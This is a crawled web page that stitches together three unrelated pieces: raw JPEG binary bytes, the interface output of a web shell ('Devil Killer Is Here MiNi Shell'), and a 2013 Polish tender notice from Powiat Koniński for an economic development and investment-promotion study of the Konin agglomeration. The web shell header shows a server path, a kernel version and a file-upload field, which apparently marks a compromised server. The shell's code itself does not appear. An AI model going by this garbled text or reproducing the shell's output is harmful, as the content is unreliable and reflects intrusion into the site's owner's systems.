JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/509452-N-2013.html

<p class="kh_header"><b>Konin: Opracowanie Studium rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych Obszaru Funkcjonalnego Aglomeracji Konińskiej</b><br>
<b>Numer ogłoszenia: 509452 - 2013; data zamieszczenia: 10.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Koniński - Starostwo Powiatowe w Koninie , Al. 1 Maja  9, 62-510 Konin, woj. wielkopolskie, tel. 63 240 32 12, faks 63 240 32 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Studium rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych Obszaru Funkcjonalnego Aglomeracji Konińskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przy opracowywaniu studium Wykonawcay będą opierać się na danych statystycznych, przeprowadzonej wcześniej i dostarczonej przez Zamawiającego diagnozie i badaniach społecznych Obszaru Funkcjonalnego Aglomeracji Konińskiej (raport z badań) oraz na konsultacjach społecznych, spotkaniach warsztatowych, które odbędą się w trakcie opracowywania dokumentu. Wszystkie wnioski, opinie i rekomendacje uzyskane w ramach dialogu społecznego powinny być wykorzystane przez Wykonawcę w opracowaniu dokumentu strategicznego.

Grupa docelowa 
Obszar Funkcjonalny Aglomeracja Konińska (liczba mieszkańców: 206 084 - dane GUS 2012) złożony z partnerów samorządowych: Miasto Konin (powiat grodzki), Powiat Koniński (powiat ziemski) oraz 14 gmin powiatu konińskiego: Miasto i Gmina Golina, Miasto i Gmina Kleczew, Miasto i Gmina Rychwał, Miasto i Gmina Ślesin, Miasto i Gmina Sompolno, Gmina Grodziec, Gmina Kazimierz Biskupi, Gmina Kramsk, Gmina Krzymów, Gmina Rzgów, Gmina Skulsk, Gmina Stare Miasto, Gmina Wilczyn i Gmina Wierzbinek. 

Proponowany sposób przeprowadzenia dialogu społecznego
W trakcie prac nad opracowywaniem studium rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych zostaną przeprowadzone:
a)konsultacje społeczne - wśród partnerów społeczno-gospodarczych, zwłaszcza lokalnych (m.in. mieszkańców, organizacji pozarządowych, podmiotów ekonomii społecznej). Konsultacji poddany zostanie wypracowany wstępny zestaw celów
 i kierunków rozwojowych OFAK. Wykonawca przygotuje merytoryczny zakres konsultacji z uwzględnieniem  mieszkańców powiatu konińskiego i Miasta Konina dla 60 osób na studium rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych.
b)spotkania warsztatowe na etapie tworzenia dokumentu z przedstawicielami partnerów projektu tj. min. 2 spotkania warsztatowe dla każdego dokumentu, dotyczące m.in. analizy SWOT oraz wyznaczenia celów i zadań do zrealizowania,
c)konsultacje ze Stałym Społecznym Zespołem Konsultacyjnym (raz na kwartał)
d)konsultacje z Aglomeracyjnym Konwentem Samorządowym (raz na kwartał)
Za zorganizowanie całego procesu konsultacji odpowiedzialny będzie Wykonawca, w tym zobowiązany będzie do zapewnienia środków niezbędnych do prowadzenia warsztatów i konsultacji społecznych (Zamawiający może udostępnić salę). Wykonawca zobowiązany jest do zapewnienia osoby (osób), która będzie prowadziła spotkania.

Wielkość opracowania:
Studium rozwoju gospodarczego wraz z programem promocji trenów inwestycyjnych OFAK 
- min. 150 stron

Studium zostanie dostarczone Zamawiającemu w postaci:
- elektronicznej - dwa nośniki CD lub DVD zawierające studium w formie MS Word 
i dwa nośniki CD lub DVD zawierające studium w formacie PDF,
- oprawiony wydruk w sztywnej oprawie - 20  egzemplarzy 
Merytoryka i prawa autorskie
Wykonawca odpowiada za merytoryczną stronę opracowania, błędy literowe, układ i zawartość. W przypadku stwierdzenia jakichkolwiek błędów w opracowaniu Wykonawca uwzględni uwagi Zamawiającego. Wykonawca przekazuje Zamawiającemu prawa autorskie do opracowania (zgodnie z § 7 wzoru umowy - załącznik nr 2 do SIWZ).

Zgodność z innymi dokumentami
Studium rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych powinno być zgodne z dokumentami lokalnymi, regionalnymi i krajowymi, których treść porusza tematykę opracowywanego dokumentu.
 
Wymagania dotyczące współpracy Wykonawcy z Zamawiającym:
W trakcie realizacji  od Wykonawcy wymaga się:
-sprawnej i terminowej realizacji zamówienia, w tym uwzględnienia w trakcie jego realizacji sugestii zgłaszanych przez Zamawiającego,
- wyznaczenia osoby do kontaktów roboczych z Zamawiającym,
- pozostawania w stałym kontakcie z Zamawiającym (spotkania kierownika zespołu  z przedstawicielami Zamawiającego odpowiednio do potrzeb, cotygodniowe informacje nt. postępu w opracowaniu studium, przekazywane poczta elektroniczną),
- bezzwłocznego przedstawienia na żądanie Zamawiającego elektronicznego raportu z postępu w realizacji opracowywania studium,
- bezzwłocznego informowania o pojawiających się problemach, zagrożeniach lub opóźnieniach w realizacji w stosunku do harmonogramu, a także innych zagadnieniach istotnych dla realizacji usługi,
- konsultowanie z Zamawiającym decyzji związanych z realizacja zamówienia 
w przypadku pojawienia się trudności w trakcie jego realizacji,
- przekazanie Zamawiającemu pełnej dokumentacji opracowanej w trakcje realizacji przedsięwzięcia,
- oznaczenie wszystkich materiałów przygotowanych w trakcie realizacji zadania zgodnie z zasadami wizualizacji UE, tj. Zadanie zostało zrealizowane przy współfinansowaniu ze środków Unii Europejskiej przyznanych w ramach Konkursu dotacji na działania wspierające jednostki samorządu terytorialnego w zakresie planowania miejskich obszarów funkcjonalnych- ogłoszonego przez Ministerstwo Rozwoju Regionalnego (obecnie Ministerstwo Infrastruktury i Rozwoju). Dodatkowo musi zostać zamieszczone logo Unii Europejskiej i logo POPT 2007-2013 oraz informacje o współfinansowaniu projektu ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Pomocy Technicznej  2007 - 2013 (zasady umieszczania informacji o współfinansowaniu oraz logotypy znajdują się na stronie: http:www.popt.gov.plzpfeStronyZasady.aspx) oraz logo Powiatu Konińskiego,
- od Wykonawcy oczekuje się zagwarantowania dyspozycyjności i dostępności podczas prac wszystkich ekspertów, którzy wejdą w skład zespołu, 
- potwierdzenie odbioru studium od Wykonawcy odbywać będzie się na spotkaniach organizacyjnych, a dokumentem potwierdzającym odbiór dokumentu będzie protokół zdawczo - odbiorczy;
- Zamawiający zastrzega sobie możliwość wielokrotnego zgłaszania uwag do wersji roboczych opracowanego dokumentu,
- Wykonawca przedstawi prezentację multimedialną studium podczas spotkania Aglomeracyjnego Konwentu Samorządowego, Stałego Społecznego Zespołu Konsultacyjnego oraz konferencji podsumowującej projekt.
Zadanie Wykonawcy będzie polegało na opracowaniu Studium rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych Obszaru Funkcjonalnego Aglomeracji Konińskiej.

Zakres tematyczny:
1.Analiza rynku pracy w kontekście wzmocnienia usług i przedsiębiorczości,
2.Przeciwdziałanie wykluczeniu społecznemu mieszkańców regionu,
3.Opracowanie koncepcji terenów inwestycyjnych samorządów OFAK,
4.Analiza rynku edukacyjnego w kontekście zapotrzebowania na zawody,
5.Wielofunkcyjny rozwój obszarów wiejskich,
6.Środowisko przyrodnicze,
7.Uwarunkowania rozwoju:
- Tendencje rozwoju demograficznego i gospodarczego;
- Zagospodarowanie przestrzenne;
- Stan planistyczny; 
- Walory kulturowe i turystyczne;
- Stan i funkcjonowanie środowiska,
- Struktura własnościowa gruntów, 
- System transportowy; 
- Infrastruktura techniczna; 
- Opracowania planistyczne o znaczeniu europejskim, krajowym i regionalnym.
8.Kierunki zagospodarowania przestrzennego:
- Kierunki zmian w zagospodarowaniu przestrzennym;
- Kierunki i wskaźniki dotyczące zagospodarowania i użytkowania terenów,            w tym tereny wyłączone spod zabudowy; 
- Ochrona dziedzictwa kulturowego;
- Turystyka i rekreacja np. walory wód termalnych, 
- Ochrona środowiska i jego zasobów np. obszary chronione;
- Rozwój systemu transportowego;
- Rozwój infrastruktury technicznej (w tym: kanalizacja, wodociągi, ciepłownictwo, elektroenergetyka oraz gaz);
- Zasady rozmieszczenia inwestycji celu publicznego o znaczeniu lokalnym             i ponadlokalnym;
- Zasady kształtowania rolniczej i leśnej przestrzeni produkcyjnej;
- Obszary narażone na niebezpieczeństwo powodzi;
- Obszary wymagające rewitalizacji (tereny zdegradowane, poprzemysłowe);
- Obszary problemowe; 
- Planowanie przestrzenne; 
9.Realizacja polityki przestrzennej:
- Planowanie miejscowe,
- Gospodarowanie mieniem komunalnym,
Programy operacyjne oraz projekty gminne i miejskie.
10.Promocja terenów inwestycyjnych np. wskazanie kierunków promocji dla poszczególnych regionów Obszaru Funkcjonalnego Aglomeracji Konińskiej
11.Wyniki przeprowadzonych badań społecznych, 
12.Przebieg konsultacji społecznych,
13.Prognoza oddziaływania na środowisko studium rozwoju gospodarczego OFAK wraz z programem promocji terenów inwestycyjnych OFAK,
14.Analiza SWOT systemu rozwoju gospodarczego 
15.Tryb i zasady monitoringu i ewaluacji postępów wdrażania studium

Harmonogram prac:
Realizacja Studium rozwoju gospodarczego OFAK wraz z programem promocji terenów inwestycyjnych OFAK od daty zawarcia umowy do 30 września 2014 r:
a)Przygotowanie oraz zaakceptowanie harmonogramu prac nad opracowaniem studium, propozycja ankiety na konsultacje społeczne oraz wstępna koncepcja zawartości studium (do 31 marca 2014 r.)
b)Opracowywanie studium oraz przeprowadzanie dialogu społecznego (marzec - sierpień 2014 r.)
c)Projekt opracowanego studium (do 31 sierpnia 2014 r.)
d)Przedstawienie ostatecznej wersji studium rozwoju gospodarczego OFAK wraz
z programem promocji terenów inwestycyjnych OFAK (do 30 września 2014 r.).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.22.00.00-0, 71.24.00.00-9, 90.71.14.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonania oceny spełnienia tego warunku.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu 
o przedłożony przez Wykonawców  załącznik nr 3, na zasadzie spełnienia-nie spełnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy wykażą, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonali co najmniej 1 zamówienie dotyczące opracowania studium/strategii rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych JST lub Obszaru Funkcjonalnego liczącego co najmniej 50.000 mieszkańców i 1 usługę polegającą na sporządzeniu prognozy oddziaływania na środowisko dla dokumentu strategicznego obejmującego swoim zakresem obszar JST lub Obszar Funkcjonalny.
Należyte wykonanie potwierdzone zostanie stosownymi dokumentami w oryginale lub kserokopią potwierdzoną za zgodność z oryginałem przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy wykażą, że mają do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej stanowisk:
a)Osoba posiadająca doświadczenie w zakresie analiz społeczno-gospodarczych polegające na tym, że była członkiem zespołu w co najmniej jednym zadaniu porównywalnym rzeczowo z zakresem przedmiotu zamówienia tj. sporządziła analizę do strategii/studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 50.000 mieszkańców,
b)Osoba posiadająca doświadczenie w zakresie moderowania spotkań podczas prac nad dokumentem strategicznym lub opracowaniem porównywalnym rzeczowo        z zakresem przedmiotu zamówienia tj. prowadziła warsztaty, spotkania itp. służące opracowaniu strategii/studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 50.000 mieszkańców.
c)Osoba posiadająca doświadczenie w zakresie opracowań strategicznych polegające na tym, że była członkiem zespołu w co najmniej jednym zadaniu porównywalnym rzeczowo z zakresem przedmiotu zamówienia tj. opracowywała strategię/studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 50.000 mieszkańców.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu 
o przedłożony przez Wykonawców załącznik Nr 6, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy wykażą, że mają do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej stanowisk:
a)Osoba posiadająca doświadczenie w zakresie analiz społeczno-gospodarczych polegające na tym, że była członkiem zespołu w co najmniej jednym zadaniu porównywalnym rzeczowo z zakresem przedmiotu zamówienia tj. sporządziła analizę do strategii/studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 50.000 mieszkańców,
b)Osoba posiadająca doświadczenie w zakresie moderowania spotkań podczas prac nad dokumentem strategicznym lub opracowaniem porównywalnym rzeczowo         z zakresem przedmiotu zamówienia tj. prowadziła warsztaty, spotkania itp. służące opracowaniu strategii/studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 50.000 mieszkańców.
c)Osoba posiadająca doświadczenie w zakresie opracowań strategicznych polegające na tym, że była członkiem zespołu w co najmniej jednym zadaniu porównywalnym rzeczowo z zakresem przedmiotu zamówienia tj. opracowywała strategię/studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 50.000 mieszkańców.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu 
o przedłożony przez Wykonawców załącznik Nr 6, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania ww. warunku.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu   o przedłożony przez Wykonawców załącznik Nr 3, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia następujących zmian do zawartej umowy, na podstawie art. 144 ust. 1 ustawy:
a)zgodnie z § 10 umowy, skład zespołu może być zmieniony w trakcie realizacji umowy po wcześniejszym przedstawieniu Zamawiającemu przez Wykonawcę pisemnej informacji o proponowanej zmianie, wraz z wyjaśnieniem przyczyn proponowanej zmiany oraz wyrażeniu pisemnej zgody przez Zamawiającego. Zamawiający zaakceptuje taką zmianę wyłącznie wtedy, gdy doświadczenie proponowanych osób będzie takie samo lub wyższe od doświadczenia wymaganego w warunkach udziału w postępowaniu, o których mowa w pkt. 4.1.3 SIWZ.
b)zgodnie z § 8 ust. 2 umowy termin realizacji zamówienia może ulec zmianie        w przypadku niedotrzymania przez Zamawiającego terminu przekazania materiałów, dokumentów i danych niezbędnych do prawidłowego wykonania zamówienia -        o liczbę dni równą opóźnieniu udostępnienia materiałów, dokumentów i danych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Koninie
Aleje 1 Maja 9, 62-510 Konin
pok. 363,364.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2013 godzina 11:00, miejsce: Starostwo Powiatowe w Koninie
Aleje 1 Maja 9, 62-510 Konin
p.168 (Kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt -Aglomeracja konińska - współpraca JST kluczem do nowoczesnego rozwoju gospodarczego, jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013.</p>
